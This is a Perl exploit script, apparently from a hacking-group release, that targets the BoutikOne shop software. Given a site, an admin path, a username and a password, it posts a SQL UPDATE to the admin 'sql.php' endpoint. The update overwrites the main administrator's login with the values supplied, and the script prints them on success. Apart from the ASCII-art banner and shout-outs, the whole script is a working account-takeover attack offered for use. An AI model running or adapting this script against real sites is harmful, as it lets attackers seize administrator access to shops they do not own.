#!/usr/bin/perl -w
# Exploit Title: BoutikOne CSRF Add User
# Exploit Author: GarA
# Vendor Homepage: www.boutikone.com
# Tested on: Win Xp sp3
system ("color a");
system ("cls");
$num_args = $#ARGV + 1;
if ($num_args != 4) {
print " :MM:....:HMMM .MMMMMMMMMM. \n";
print " .M .. MM. M. :MMMMH \n";
print " M M MH .MM M \n" ;
print " .M HM M: MMMMMMH \n" ;
print " HM MMH :M MMMMMMMMMMMH \n" ;
print " .M MMMMMMM: . .MMMMMMMMMMM. \n" ;
print " M MMMM :MMMMMMMMH H M MMMMMMMM: \n" ;
print " MMM . :MMMMMMMM M MMMMMM \n" ;
print " M HMM H MM HMMMMM M. MMMMM \n" ;
print " .: .M H.: MMHMM M .MMM \n" ;
print " . .MM MM M: M :MMH MMMMM M. HMMM HMMMM .M. .M MH \n";
print " .. :MMMM: .M . MM. HMH :. MMM. .M MM MH .MM MMM :M: \n" ;
print " H : :MMH M .MM MH .MM . MMMM :M. MM MHM MM \n" ;
print " MM HM: : HM MM M .MH .MMM: MM M..M.:M: \n" ;
print " HM: .MMM :M MM MM :H .MH MM MM .MMM MMMM \n" ;
print " MMMMHHMM :MH M HMMMMH MH MMMMM MM .MM \n" ;
print " \n";
print "\n BoutikOne CSRF Add User \n";
print "\nUsage: $0 www.site.com admin-path user password \n";
print ("=========================================\n");
print (" Exploit discovered & coded by GarA \n");
print " Gr33tz to : Dr.Sayr0s , Dr.BiLLi , Last Breath \n";
print " Dr.Milas , O-Snip3r , Ev!l Code , P4L-T3RRORIST \n";
print " Mr NoRvI , Dr.s@3d , Mr MeGa , ViRuS_PaL \n";
print " Mafia Hack Team & Scr3w & Arhack.net ";
exit;
}
$site=$ARGV[0];
$admn=$ARGV[1];
$usr=$ARGV[2];
$pass=$ARGV[3];
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
my $req = new HTTP::Request POST => 'http://' . $site . '/'. $admn . '/sql.php';
$req->content_type('application/x-www-form-urlencoded');
$req->content('request=UPDATE+admin+SET+motdepasse+%3D+%27' . $pass .'%27+%2C+admin+%3D+%27' . $usr . '%27+WHERE+ID+%3D+1');
my $res = $ua->request($req);
if ($res->content =~ /SQL exйcutйe avec succ/ )
{
print ("Don3 ~\n");
print ("usr :" . $usr . "\n");
print ( "pwd :" . $pass . "\n");
print ("3nj0y \n");
}
else
{
print "Faild :s \n";
}
